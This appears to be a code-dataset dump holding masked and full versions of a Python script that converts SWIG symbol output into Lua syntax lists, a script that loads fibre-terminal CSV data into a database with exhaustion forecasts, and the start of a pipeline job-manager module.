section.append(line)\nappendSection(section)\nfile.close()\n<mask token>\nfor section in sections:\n prefix = ' '\n name = section[0]\n if name == module:\n prefix = module + '.'\n file.write(module + '\\n')\n elif name.endswith('.SwigStatic'):\n name = name.split('.')[0]\n prefix = module + '.' + name + '.'\n else:\n file.write(module + '.' + name + '\\n')\n lines = section[1:]\n lines.sort()\n for line in lines:\n if not line.endswith('.SwigStatic'):\n file.write(prefix + line + '\\n')\n num = num + 1\n if num < len(sections):\n file.write('\\n')\nfile.close()\n",
"step-3": "<mask token>\nif len(sys.argv) < 2:\n print('USAGE: lua_syntax.py MODULENAME INFILE')\n exit(0)\nmodule = sys.argv[1]\ninfile = sys.argv[2]\nsections = []\nsectionMatches = ['string', 'string.SwigStatic']\nsectionEnds = ['Vector']\nlineMatches = ['string', 'lua:cdata']\nlineStarts = ['~', '__', 'of', 'ofx']\nlineEnds = ['Vector']\nfor arg in sys.argv[3:]:\n sectionIgnores.append(arg)\n\n\ndef matches(needle, haystack):\n for straw in haystack:\n if needle == straw:\n return True\n return False\n\n\ndef appendSection(section):\n if len(section) < 2:\n return\n if not section[0].endswith('-'):\n print('warning: section name does not end with -: ' + section[0])\n return\n match = re.match('\\\\S+', section[0])\n if match:\n if section[0] == '-':\n section[0] = module\n else:\n section[0] = match.group(0)\n else:\n print('warning: section name had no non-whitespace match: ' +\n section[0])\n return\n if matches(section[0], sectionMatches):\n return\n if any(section[0].endswith(x) for x in sectionEnds):\n return\n sections.append(section)\n\n\nfile = open(infile)\nsection = []\nfor line in file:\n line = line.strip()\n if line.startswith('LANGUAGE'):\n continue\n if line.startswith('='):\n appendSection(section)\n section = []\n else:\n if len(line) == 0:\n continue\n if any(line.startswith(x) for x in lineStarts):\n continue\n if any(line.endswith(x) for x in lineEnds):\n continue\n if matches(line, lineMatches):\n continue\n section.append(line)\nappendSection(section)\nfile.close()\nsection = []\nfile = open(module + '_syntax.txt', 'w')\nnum = 0\nfor section in sections:\n prefix = ' '\n name = section[0]\n if name == module:\n prefix = module + '.'\n file.write(module + '\\n')\n elif name.endswith('.SwigStatic'):\n name = name.split('.')[0]\n prefix = module + '.' + name + '.'\n else:\n file.write(module + '.' + name + '\\n')\n lines = section[1:]\n lines.sort()\n for line in lines:\n if not line.endswith('.SwigStatic'):\n file.write(prefix + line + '\\n')\n num = num + 1\n if num < len(sections):\n file.write('\\n')\nfile.close()\n",
"step-4": "import sys\nimport re\nif len(sys.argv) < 2:\n print('USAGE: lua_syntax.py MODULENAME INFILE')\n exit(0)\nmodule = sys.argv[1]\ninfile = sys.argv[2]\nsections = []\nsectionMatches = ['string', 'string.SwigStatic']\nsectionEnds = ['Vector']\nlineMatches = ['string', 'lua:cdata']\nlineStarts = ['~', '__', 'of', 'ofx']\nlineEnds = ['Vector']\nfor arg in sys.argv[3:]:\n sectionIgnores.append(arg)\n\n\ndef matches(needle, haystack):\n for straw in haystack:\n if needle == straw:\n return True\n return False\n\n\ndef appendSection(section):\n if len(section) < 2:\n return\n if not section[0].endswith('-'):\n print('warning: section name does not end with -: ' + section[0])\n return\n match = re.match('\\\\S+', section[0])\n if match:\n if section[0] == '-':\n section[0] = module\n else:\n section[0] = match.group(0)\n else:\n print('warning: section name had no non-whitespace match: ' +\n section[0])\n return\n if matches(section[0], sectionMatches):\n return\n if any(section[0].endswith(x) for x in sectionEnds):\n return\n sections.append(section)\n\n\nfile = open(infile)\nsection = []\nfor line in file:\n line = line.strip()\n if line.startswith('LANGUAGE'):\n continue\n if line.startswith('='):\n appendSection(section)\n section = []\n else:\n if len(line) == 0:\n continue\n if any(line.startswith(x) for x in lineStarts):\n continue\n if any(line.endswith(x) for x in lineEnds):\n continue\n if matches(line, lineMatches):\n continue\n section.append(line)\nappendSection(section)\nfile.close()\nsection = []\nfile = open(module + '_syntax.txt', 'w')\nnum = 0\nfor section in sections:\n prefix = ' '\n name = section[0]\n if name == module:\n prefix = module + '.'\n file.write(module + '\\n')\n elif name.endswith('.SwigStatic'):\n name = name.split('.')[0]\n prefix = module + '.' + name + '.'\n else:\n file.write(module + '.' + name + '\\n')\n lines = section[1:]\n lines.sort()\n for line in lines:\n if not line.endswith('.SwigStatic'):\n file.write(prefix + line + '\\n')\n num = num + 1\n if num < len(sections):\n file.write('\\n')\nfile.close()\n",
"step-5": "#! /usr/bin/python\n#\n# convert the swig -debug-lsymbols output text file format into\n# a simple list of lua module names and classes\n#\n# Dan Wilcox <[email protected]> 2017\n#\nimport sys\nimport re\n\nif len(sys.argv) < 2:\n print(\"USAGE: lua_syntax.py MODULENAME INFILE\")\n exit(0)\n\nmodule = sys.argv[1]\ninfile = sys.argv[2]\nsections = []\nsectionMatches = [\n \"string\", # swig std::string wrappers\n \"string.SwigStatic\" # swig std::string wrappers\n]\nsectionEnds = [\n \"Vector\" # swig std::vector wrappers\n]\nlineMatches = [ \n \"string\", # swig std::string wrappers\n \"lua:cdata\", # c pointers\n]\nlineStarts = [\n \"~\", # destructors\n \"__\", # lua metatable __add, __sub, etc\n \"of\", # of core type prefixes\n \"ofx\" # ofx addon type prefixes\n]\nlineEnds = [\n \"Vector\" # swig std::vector wrappers\n]\n\n# any other user-supplied section ignores\nfor arg in sys.argv[3:]:\n sectionIgnores.append(arg)\n\n# check if a string matches one in an array\ndef matches(needle, haystack):\n for straw in haystack:\n if needle == straw:\n return True\n return False\n\n# append a section to the sections array if the name passes muster\ndef appendSection(section):\n # drop static classes which don't have any symbols\n if len(section) < 2:\n return\n # section names are followed by a \" -\", so double check\n if not section[0].endswith(\"-\"):\n print(\"warning: section name does not end with -: \"+section[0])\n return\n # grab first non-whitespace name ie. \"Color\" from \"Color -\"\n match = re.match(\"\\S+\", section[0])\n if match:\n if section[0] == \"-\": # main module is just a \"-\"\n section[0] = module\n else: # class name\n section[0] = match.group(0)\n else:\n print(\"warning: section name had no non-whitespace match: \"+section[0])\n return\n # drop sections which match certain strings\n if matches(section[0], sectionMatches):\n return\n # drop sections which contain certain strings\n if any(section[0].endswith(x) for x in sectionEnds):\n return\n # if got this far, the section must be good...\n sections.append(section)\n\n# parse swig output into sections\nfile = open(infile)\nsection = []\nfor line in file:\n # strip whitespace\n line = line.strip()\n # ignore beginning and end lines\n if line.startswith(\"LANGUAGE\"):\n continue\n # section headers are a series of = chars, ie. ==========\n if line.startswith(\"=\"):\n appendSection(section)\n section = []\n # append line within a section\n else:\n # empty line\n if len(line) == 0:\n continue\n # drop lines with certain prefixes\n if any(line.startswith(x) for x in lineStarts):\n continue\n # drop lines with certain suffixes\n if any(line.endswith(x) for x in lineEnds):\n continue\n # drop lines which match certain strings\n if matches(line, lineMatches):\n continue\n # line must be good\n section.append(line)\nappendSection(section) # catch any left overs\nfile.close()\nsection = []\n\n# for section in sections:\n# print(section)\n# exit(0)\n\n# output module & section names to each section line\nfile = open(module+\"_syntax.txt\", \"w\")\nnum = 0\nfor section in sections:\n\n # grab name from first line and output\n prefix = \" \"\n name = section[0]\n if name == module: # main module\n prefix = module+\".\"\n file.write(module+\"\\n\")\n elif name.endswith(\".SwigStatic\"): # static members\n name = name.split(\".\")[0] # drop SwigStatic suffix\n prefix = module+\".\"+name+\".\"\n else: # class instance members\n file.write(module+\".\"+name+\"\\n\")\n\n # sort remaining lines\n lines = section[1:]\n lines.sort()\n\n # output with module.class prefix\n for line in lines:\n if not line.endswith(\".SwigStatic\"): # drop statics from main module\n file.write(prefix+line+\"\\n\")\n num = num + 1\n\n # linebreak between sections\n if num < len(sections):\n file.write(\"\\n\")\nfile.close()\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
from CTO import CTO
#from UI import UIManager
from Cidades import Cidades
from Database import Database
from datetime import datetime
class Main:
def __init__(self, cidade_filename="", dados_filename=""):
#cidade_filename, dados_filename = UIManager().get_filenames()
print("cidade: " + cidade_filename)
self.cidades = Cidades(cidade_filename)
if dados_filename != "":
self.processaCSV(dados_filename)
self.recuperaDados()
self.insereDados()
def processaCSV(self, filename):
with open(filename, 'r', encoding='ISO-8859-1') as input_file:
self.concessao = {}
self.expansao = {}
for line in input_file.readlines():
attributes = line.split(';')
localidade = str(attributes[14])
estacao = str(attributes[15])
cto = str(attributes[1])
status = str(attributes[13])
if localidade in self.cidades.concessao:
if cto in self.concessao:
self.concessao[cto].addLeitura(status)
else:
self.concessao[cto] = CTO(localidade, estacao, cto)
self.concessao[cto].addLeitura(status)
elif localidade in self.cidades.expansao:
if cto in self.expansao:
self.expansao[cto].addLeitura(status)
else:
self.expansao[cto] = CTO(localidade, estacao, cto)
self.expansao[cto].addLeitura(status)
def insereDados(self):
hoje = datetime.utcnow()
#hoje = datetime(2019, 1, 25)
argsCn = []
for nome, cto in self.concessao.items():
nomeCto = cto.dict['CTO']
try:
antigoOcupado = self.antigoConcessao[nomeCto][8]
antigoData = self.antigoConcessao[nomeCto][1]
ocupadoAtual = int(cto.dict['OCUPADO'])
vagoAtual = int(cto.dict['VAGO'])
numDias = (hoje - self.antigoConcessao[nomeCto][1]).days
taxa_crescimento = (ocupadoAtual - antigoOcupado) / numDias
previsao = vagoAtual / taxa_crescimento
except Exception as e:
previsao = -1
argsCn.append(
(hoje,) + cto.as_a_tuple() + (previsao,)
)
argsEx = []
for nome, cto in self.expansao.items():
nomeCto = cto.dict['CTO']
try:
antigoOcupado = self.antigoExpansao[nomeCto][8]
antigoData = self.antigoExpansao[nomeCto][1]
ocupadoAtual = int(cto.dict['OCUPADO'])
vagoAtual = int(cto.dict['VAGO'])
numDias = (hoje - self.antigoExpansao[nomeCto][1]).days
taxa_crescimento = (ocupadoAtual - antigoOcupado) / numDias
previsao = vagoAtual / taxa_crescimento
except Exception as e:
previsao = -1
argsEx.append(
(hoje,) + cto.as_a_tuple() + (previsao,)
)
db = Database()
query = """INSERT INTO concessao (dia, local, estacao, cto, defeito, designado, reservado, ocupado, vago, total, previsao_esgotamento)
VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"""
db.executaQuery(query, argsCn)
query = """INSERT INTO expansao (dia, local, estacao, cto, defeito, designado, reservado, ocupado, vago, total, previsao_esgotamento)
VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"""
db.executaQuery(query, argsEx)
def recuperaDados(self):
db = Database()
self.antigoConcessao = {}
self.antigoExpansao = {}
for registro in db.executaQuery('SELECT * from concessao where dia = (select Max(dia) from concessao)'):
self.antigoConcessao[registro[4]] = registro
for registro in db.executaQuery('SELECT * from expansao where dia = (select Max(dia) from expansao)'):
self.antigoExpansao[registro[4]] = registro
if __name__ == '__main__':
Main()
|
normal
|
{
"blob_id": "c5f46be6d7214614892d227c76c75e77433a8fa9",
"index": 9517,
"step-1": "<mask token>\n\n\nclass Main:\n <mask token>\n\n def processaCSV(self, filename):\n with open(filename, 'r', encoding='ISO-8859-1') as input_file:\n self.concessao = {}\n self.expansao = {}\n for line in input_file.readlines():\n attributes = line.split(';')\n localidade = str(attributes[14])\n estacao = str(attributes[15])\n cto = str(attributes[1])\n status = str(attributes[13])\n if localidade in self.cidades.concessao:\n if cto in self.concessao:\n self.concessao[cto].addLeitura(status)\n else:\n self.concessao[cto] = CTO(localidade, estacao, cto)\n self.concessao[cto].addLeitura(status)\n elif localidade in self.cidades.expansao:\n if cto in self.expansao:\n self.expansao[cto].addLeitura(status)\n else:\n self.expansao[cto] = CTO(localidade, estacao, cto)\n self.expansao[cto].addLeitura(status)\n\n def insereDados(self):\n hoje = datetime.utcnow()\n argsCn = []\n for nome, cto in self.concessao.items():\n nomeCto = cto.dict['CTO']\n try:\n antigoOcupado = self.antigoConcessao[nomeCto][8]\n antigoData = self.antigoConcessao[nomeCto][1]\n ocupadoAtual = int(cto.dict['OCUPADO'])\n vagoAtual = int(cto.dict['VAGO'])\n numDias = (hoje - self.antigoConcessao[nomeCto][1]).days\n taxa_crescimento = (ocupadoAtual - antigoOcupado) / numDias\n previsao = vagoAtual / taxa_crescimento\n except Exception as e:\n previsao = -1\n argsCn.append((hoje,) + cto.as_a_tuple() + (previsao,))\n argsEx = []\n for nome, cto in self.expansao.items():\n nomeCto = cto.dict['CTO']\n try:\n antigoOcupado = self.antigoExpansao[nomeCto][8]\n antigoData = self.antigoExpansao[nomeCto][1]\n ocupadoAtual = int(cto.dict['OCUPADO'])\n vagoAtual = int(cto.dict['VAGO'])\n numDias = (hoje - self.antigoExpansao[nomeCto][1]).days\n taxa_crescimento = (ocupadoAtual - antigoOcupado) / numDias\n previsao = vagoAtual / taxa_crescimento\n except Exception as e:\n previsao = -1\n argsEx.append((hoje,) + cto.as_a_tuple() + (previsao,))\n db = Database()\n query = \"\"\"INSERT INTO concessao (dia, local, estacao, cto, defeito, designado, reservado, ocupado, vago, total, previsao_esgotamento)\n VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\"\"\n db.executaQuery(query, argsCn)\n query = \"\"\"INSERT INTO expansao (dia, local, estacao, cto, defeito, designado, reservado, ocupado, vago, total, previsao_esgotamento)\n VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\"\"\n db.executaQuery(query, argsEx)\n\n def recuperaDados(self):\n db = Database()\n self.antigoConcessao = {}\n self.antigoExpansao = {}\n for registro in db.executaQuery(\n 'SELECT * from concessao where dia = (select Max(dia) from concessao)'\n ):\n self.antigoConcessao[registro[4]] = registro\n for registro in db.executaQuery(\n 'SELECT * from expansao where dia = (select Max(dia) from expansao)'\n ):\n self.antigoExpansao[registro[4]] = registro\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Main:\n\n def __init__(self, cidade_filename='', dados_filename=''):\n print('cidade: ' + cidade_filename)\n self.cidades = Cidades(cidade_filename)\n if dados_filename != '':\n self.processaCSV(dados_filename)\n self.recuperaDados()\n self.insereDados()\n\n def processaCSV(self, filename):\n with open(filename, 'r', encoding='ISO-8859-1') as input_file:\n self.concessao = {}\n self.expansao = {}\n for line in input_file.readlines():\n attributes = line.split(';')\n localidade = str(attributes[14])\n estacao = str(attributes[15])\n cto = str(attributes[1])\n status = str(attributes[13])\n if localidade in self.cidades.concessao:\n if cto in self.concessao:\n self.concessao[cto].addLeitura(status)\n else:\n self.concessao[cto] = CTO(localidade, estacao, cto)\n self.concessao[cto].addLeitura(status)\n elif localidade in self.cidades.expansao:\n if cto in self.expansao:\n self.expansao[cto].addLeitura(status)\n else:\n self.expansao[cto] = CTO(localidade, estacao, cto)\n self.expansao[cto].addLeitura(status)\n\n def insereDados(self):\n hoje = datetime.utcnow()\n argsCn = []\n for nome, cto in self.concessao.items():\n nomeCto = cto.dict['CTO']\n try:\n antigoOcupado = self.antigoConcessao[nomeCto][8]\n antigoData = self.antigoConcessao[nomeCto][1]\n ocupadoAtual = int(cto.dict['OCUPADO'])\n vagoAtual = int(cto.dict['VAGO'])\n numDias = (hoje - self.antigoConcessao[nomeCto][1]).days\n taxa_crescimento = (ocupadoAtual - antigoOcupado) / numDias\n previsao = vagoAtual / taxa_crescimento\n except Exception as e:\n previsao = -1\n argsCn.append((hoje,) + cto.as_a_tuple() + (previsao,))\n argsEx = []\n for nome, cto in self.expansao.items():\n nomeCto = cto.dict['CTO']\n try:\n antigoOcupado = self.antigoExpansao[nomeCto][8]\n antigoData = self.antigoExpansao[nomeCto][1]\n ocupadoAtual = int(cto.dict['OCUPADO'])\n vagoAtual = int(cto.dict['VAGO'])\n numDias = (hoje - self.antigoExpansao[nomeCto][1]).days\n taxa_crescimento = (ocupadoAtual - antigoOcupado) / numDias\n previsao = vagoAtual / taxa_crescimento\n except Exception as e:\n previsao = -1\n argsEx.append((hoje,) + cto.as_a_tuple() + (previsao,))\n db = Database()\n query = \"\"\"INSERT INTO concessao (dia, local, estacao, cto, defeito, designado, reservado, ocupado, vago, total, previsao_esgotamento)\n VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\"\"\n db.executaQuery(query, argsCn)\n query = \"\"\"INSERT INTO expansao (dia, local, estacao, cto, defeito, designado, reservado, ocupado, vago, total, previsao_esgotamento)\n VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\"\"\n db.executaQuery(query, argsEx)\n\n def recuperaDados(self):\n db = Database()\n self.antigoConcessao = {}\n self.antigoExpansao = {}\n for registro in db.executaQuery(\n 'SELECT * from concessao where dia = (select Max(dia) from concessao)'\n ):\n self.antigoConcessao[registro[4]] = registro\n for registro in db.executaQuery(\n 'SELECT * from expansao where dia = (select Max(dia) from expansao)'\n ):\n self.antigoExpansao[registro[4]] = registro\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Main:\n\n def __init__(self, cidade_filename='', dados_filename=''):\n print('cidade: ' + cidade_filename)\n self.cidades = Cidades(cidade_filename)\n if dados_filename != '':\n self.processaCSV(dados_filename)\n self.recuperaDados()\n self.insereDados()\n\n def processaCSV(self, filename):\n with open(filename, 'r', encoding='ISO-8859-1') as input_file:\n self.concessao = {}\n self.expansao = {}\n for line in input_file.readlines():\n attributes = line.split(';')\n localidade = str(attributes[14])\n estacao = str(attributes[15])\n cto = str(attributes[1])\n status = str(attributes[13])\n if localidade in self.cidades.concessao:\n if cto in self.concessao:\n self.concessao[cto].addLeitura(status)\n else:\n self.concessao[cto] = CTO(localidade, estacao, cto)\n self.concessao[cto].addLeitura(status)\n elif localidade in self.cidades.expansao:\n if cto in self.expansao:\n self.expansao[cto].addLeitura(status)\n else:\n self.expansao[cto] = CTO(localidade, estacao, cto)\n self.expansao[cto].addLeitura(status)\n\n def insereDados(self):\n hoje = datetime.utcnow()\n argsCn = []\n for nome, cto in self.concessao.items():\n nomeCto = cto.dict['CTO']\n try:\n antigoOcupado = self.antigoConcessao[nomeCto][8]\n antigoData = self.antigoConcessao[nomeCto][1]\n ocupadoAtual = int(cto.dict['OCUPADO'])\n vagoAtual = int(cto.dict['VAGO'])\n numDias = (hoje - self.antigoConcessao[nomeCto][1]).days\n taxa_crescimento = (ocupadoAtual - antigoOcupado) / numDias\n previsao = vagoAtual / taxa_crescimento\n except Exception as e:\n previsao = -1\n argsCn.append((hoje,) + cto.as_a_tuple() + (previsao,))\n argsEx = []\n for nome, cto in self.expansao.items():\n nomeCto = cto.dict['CTO']\n try:\n antigoOcupado = self.antigoExpansao[nomeCto][8]\n antigoData = self.antigoExpansao[nomeCto][1]\n ocupadoAtual = int(cto.dict['OCUPADO'])\n vagoAtual = int(cto.dict['VAGO'])\n numDias = (hoje - self.antigoExpansao[nomeCto][1]).days\n taxa_crescimento = (ocupadoAtual - antigoOcupado) / numDias\n previsao = vagoAtual / taxa_crescimento\n except Exception as e:\n previsao = -1\n argsEx.append((hoje,) + cto.as_a_tuple() + (previsao,))\n db = Database()\n query = \"\"\"INSERT INTO concessao (dia, local, estacao, cto, defeito, designado, reservado, ocupado, vago, total, previsao_esgotamento)\n VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\"\"\n db.executaQuery(query, argsCn)\n query = \"\"\"INSERT INTO expansao (dia, local, estacao, cto, defeito, designado, reservado, ocupado, vago, total, previsao_esgotamento)\n VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\"\"\n db.executaQuery(query, argsEx)\n\n def recuperaDados(self):\n db = Database()\n self.antigoConcessao = {}\n self.antigoExpansao = {}\n for registro in db.executaQuery(\n 'SELECT * from concessao where dia = (select Max(dia) from concessao)'\n ):\n self.antigoConcessao[registro[4]] = registro\n for registro in db.executaQuery(\n 'SELECT * from expansao where dia = (select Max(dia) from expansao)'\n ):\n self.antigoExpansao[registro[4]] = registro\n\n\nif __name__ == '__main__':\n Main()\n",
"step-4": "from CTO import CTO\nfrom Cidades import Cidades\nfrom Database import Database\nfrom datetime import datetime\n\n\nclass Main:\n\n def __init__(self, cidade_filename='', dados_filename=''):\n print('cidade: ' + cidade_filename)\n self.cidades = Cidades(cidade_filename)\n if dados_filename != '':\n self.processaCSV(dados_filename)\n self.recuperaDados()\n self.insereDados()\n\n def processaCSV(self, filename):\n with open(filename, 'r', encoding='ISO-8859-1') as input_file:\n self.concessao = {}\n self.expansao = {}\n for line in input_file.readlines():\n attributes = line.split(';')\n localidade = str(attributes[14])\n estacao = str(attributes[15])\n cto = str(attributes[1])\n status = str(attributes[13])\n if localidade in self.cidades.concessao:\n if cto in self.concessao:\n self.concessao[cto].addLeitura(status)\n else:\n self.concessao[cto] = CTO(localidade, estacao, cto)\n self.concessao[cto].addLeitura(status)\n elif localidade in self.cidades.expansao:\n if cto in self.expansao:\n self.expansao[cto].addLeitura(status)\n else:\n self.expansao[cto] = CTO(localidade, estacao, cto)\n self.expansao[cto].addLeitura(status)\n\n def insereDados(self):\n hoje = datetime.utcnow()\n argsCn = []\n for nome, cto in self.concessao.items():\n nomeCto = cto.dict['CTO']\n try:\n antigoOcupado = self.antigoConcessao[nomeCto][8]\n antigoData = self.antigoConcessao[nomeCto][1]\n ocupadoAtual = int(cto.dict['OCUPADO'])\n vagoAtual = int(cto.dict['VAGO'])\n numDias = (hoje - self.antigoConcessao[nomeCto][1]).days\n taxa_crescimento = (ocupadoAtual - antigoOcupado) / numDias\n previsao = vagoAtual / taxa_crescimento\n except Exception as e:\n previsao = -1\n argsCn.append((hoje,) + cto.as_a_tuple() + (previsao,))\n argsEx = []\n for nome, cto in self.expansao.items():\n nomeCto = cto.dict['CTO']\n try:\n antigoOcupado = self.antigoExpansao[nomeCto][8]\n antigoData = self.antigoExpansao[nomeCto][1]\n ocupadoAtual = int(cto.dict['OCUPADO'])\n vagoAtual = int(cto.dict['VAGO'])\n numDias = (hoje - self.antigoExpansao[nomeCto][1]).days\n taxa_crescimento = (ocupadoAtual - antigoOcupado) / numDias\n previsao = vagoAtual / taxa_crescimento\n except Exception as e:\n previsao = -1\n argsEx.append((hoje,) + cto.as_a_tuple() + (previsao,))\n db = Database()\n query = \"\"\"INSERT INTO concessao (dia, local, estacao, cto, defeito, designado, reservado, ocupado, vago, total, previsao_esgotamento)\n VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\"\"\n db.executaQuery(query, argsCn)\n query = \"\"\"INSERT INTO expansao (dia, local, estacao, cto, defeito, designado, reservado, ocupado, vago, total, previsao_esgotamento)\n VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\"\"\n db.executaQuery(query, argsEx)\n\n def recuperaDados(self):\n db = Database()\n self.antigoConcessao = {}\n self.antigoExpansao = {}\n for registro in db.executaQuery(\n 'SELECT * from concessao where dia = (select Max(dia) from concessao)'\n ):\n self.antigoConcessao[registro[4]] = registro\n for registro in db.executaQuery(\n 'SELECT * from expansao where dia = (select Max(dia) from expansao)'\n ):\n self.antigoExpansao[registro[4]] = registro\n\n\nif __name__ == '__main__':\n Main()\n",
"step-5": "from CTO import CTO\n#from UI import UIManager\nfrom Cidades import Cidades\nfrom Database import Database\nfrom datetime import datetime\n\nclass Main:\n\n def __init__(self, cidade_filename=\"\", dados_filename=\"\"):\n #cidade_filename, dados_filename = UIManager().get_filenames()\n\n print(\"cidade: \" + cidade_filename)\n self.cidades = Cidades(cidade_filename)\n\n if dados_filename != \"\":\n self.processaCSV(dados_filename)\n self.recuperaDados()\n self.insereDados()\n\n\n def processaCSV(self, filename):\n with open(filename, 'r', encoding='ISO-8859-1') as input_file:\n\n self.concessao = {}\n self.expansao = {}\n for line in input_file.readlines():\n attributes = line.split(';')\n\n localidade = str(attributes[14])\n estacao = str(attributes[15])\n cto = str(attributes[1])\n status = str(attributes[13])\n\n if localidade in self.cidades.concessao:\n if cto in self.concessao:\n self.concessao[cto].addLeitura(status)\n else:\n self.concessao[cto] = CTO(localidade, estacao, cto)\n self.concessao[cto].addLeitura(status)\n\n elif localidade in self.cidades.expansao:\n if cto in self.expansao:\n self.expansao[cto].addLeitura(status)\n else:\n self.expansao[cto] = CTO(localidade, estacao, cto)\n self.expansao[cto].addLeitura(status)\n\n\n def insereDados(self):\n hoje = datetime.utcnow()\n #hoje = datetime(2019, 1, 25)\n\n argsCn = []\n for nome, cto in self.concessao.items():\n nomeCto = cto.dict['CTO']\n try:\n antigoOcupado = self.antigoConcessao[nomeCto][8]\n antigoData = self.antigoConcessao[nomeCto][1]\n\n ocupadoAtual = int(cto.dict['OCUPADO'])\n vagoAtual = int(cto.dict['VAGO'])\n numDias = (hoje - self.antigoConcessao[nomeCto][1]).days\n\n taxa_crescimento = (ocupadoAtual - antigoOcupado) / numDias\n previsao = vagoAtual / taxa_crescimento\n except Exception as e:\n previsao = -1\n argsCn.append(\n (hoje,) + cto.as_a_tuple() + (previsao,)\n )\n\n argsEx = []\n for nome, cto in self.expansao.items():\n nomeCto = cto.dict['CTO']\n try:\n antigoOcupado = self.antigoExpansao[nomeCto][8]\n antigoData = self.antigoExpansao[nomeCto][1]\n\n ocupadoAtual = int(cto.dict['OCUPADO'])\n vagoAtual = int(cto.dict['VAGO'])\n numDias = (hoje - self.antigoExpansao[nomeCto][1]).days\n\n taxa_crescimento = (ocupadoAtual - antigoOcupado) / numDias\n previsao = vagoAtual / taxa_crescimento\n except Exception as e:\n previsao = -1\n argsEx.append(\n (hoje,) + cto.as_a_tuple() + (previsao,)\n )\n\n db = Database()\n\n query = \"\"\"INSERT INTO concessao (dia, local, estacao, cto, defeito, designado, reservado, ocupado, vago, total, previsao_esgotamento)\n VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\"\"\n db.executaQuery(query, argsCn)\n\n query = \"\"\"INSERT INTO expansao (dia, local, estacao, cto, defeito, designado, reservado, ocupado, vago, total, previsao_esgotamento)\n VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\"\"\n db.executaQuery(query, argsEx)\n\n\n def recuperaDados(self):\n db = Database()\n self.antigoConcessao = {}\n self.antigoExpansao = {}\n for registro in db.executaQuery('SELECT * from concessao where dia = (select Max(dia) from concessao)'):\n self.antigoConcessao[registro[4]] = registro\n\n for registro in db.executaQuery('SELECT * from expansao where dia = (select Max(dia) from expansao)'):\n self.antigoExpansao[registro[4]] = registro\n\n\n\nif __name__ == '__main__':\n Main()\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
#
#
#
##
from __future__ import print_function, unicode_literals
import inspect
import os
import pprint as pp
import time
from time import gmtime, strftime
import subprocess
from local import *
from slurm import *
class Job_status( object ):
""" Enumerate class for job statuses, this is done differently in python 3
"""
FINISHED = 1
FAILED = 2
NO_RESTART = 3
RUNNING = 4
QUEUEING = 5
RESUBMITTED = 6
SUBMITTED = 7
CREATED = 98
KILLED = 99
UNKNOWN = 100
class Job(object):
""" This class is presenting a singular job and all information associated with it.
"""
def __init__(self, cmd, step_name, output=None, limit=None, delete_file=None, thread_id=None):
""" Create a job object
Args:
cmd (str): command to run
step_name (str): name of the step that this command belongs to
output (str): output information to pass on to the next job
limit (str): paramters to pass on to the backend
delete_file (str): File(s) to delete if the job is successful
thread_id (int): id of the thread running this
Returns:
job (obj)
"""
self.status = Job_status.CREATED
self.active = True
self.command = None
self.backend = None
self.output = output
self.step_name = None
self.pre_task_ids = None
self.delete_file = None
self.job_id = None
self.backend_id = None
self.nr_of_tries = 0
self.cmd = cmd
self.step_name = step_name
self.max_memory = None
self.cputime = None
if ( limit is not None ):
self.limit = limit
if ( delete_file is not None ):
self.delete_file = delete_file
if ( thread_id is not None ):
self.thread_id = thread_id
def __getitem__(self, item):
""" Generic getter function
Raises:
AttributeError is raised if trying to access value starting with _ or unknown value
"""
if ( item.startswith("_")):
raise AttributeError
try:
return getattr(self, item)
except KeyError:
raise AttributeError
def __setitem__(self, item, value):
""" Generic setter function
Raises:
AttributeError is raised if trying to access value starting with _ or unknown value
"""
if ( item.startswith("_")):
raise AttributeError
try:
return setattr(self, item, value)
except KeyError:
raise AttributeError
def __repr__(self):
return "{name} -> {status}".format( name=self.step_name, status=self.status )
def __str__(self):
return "{name}".format( name=self.step_name )
def delete_tmp_files(self):
""" deletes tmp files
Args:
None
Returns:
boolean: Success/failure
Raises:
None
"""
if self.delete_file is None:
return True
if ( isinstance(self.delete_file, str)):
self.delete_file = [ self.delete_file ]
for file_name in self.delete_file:
print( file_name)
if ( os.path.isfile( file_name )):
os.remove( file_name )
return True
class Thread( object):
def __init__( self, name, thread_id ):
self.name = name
self.thread_id = thread_id
def __getitem__(self, item):
""" Generic getter function
Raises:
AttributeError is raised if trying to access value starting with _ or unknown value
"""
if ( item.startswith("_")):
raise AttributeError
try:
return getattr(self, item)
except KeyError:
raise AttributeError
def __setitem__(self, item, value):
""" Generic setter function
Raises:
AttributeError is raised if trying to access value starting with _ or unknown value
"""
if ( item.startswith("_")):
raise AttributeError
try:
return setattr(self, item, value)
except KeyError:
raise AttributeError
class Manager( object ):
def __init__(self, pipeline):
""" Creates a manager object
"""
self._jobs = []
self._active_jobs = []
self._threads = []
self._thread_index = {}
self._thread_id = 1
self.local_backend = Local()
self.backend = None
self.pipeline = pipeline
def __getitem__(self, item):
""" Generic getter function
Raises:
AttributeError is raised if trying to access value starting with _ or unknown value
"""
if ( item.startswith("_")):
raise AttributeError
try:
return getattr(self, item)
except KeyError:
raise AttributeError
def __setitem__(self, item, value):
""" Generic setter function
Raises:
AttributeError is raised if trying to access value starting with _ or unknown value
"""
if ( item.startswith("_")):
raise AttributeError
try:
return setattr(self, item, value)
except KeyError:
raise AttributeError
def add_thread(self, name):
""" Create a new thread object for the manager
Args:
name (str): name of the thread
Returns:
None
"""
thread = Thread( name=name, thread_id=self._thread_id)
self._threads.append( thread )
self._thread_index[ name ] = self._thread_id
self._thread_id += 1
def get_thread_by_name( self, name):
""" gets a thread object based on name
Args:
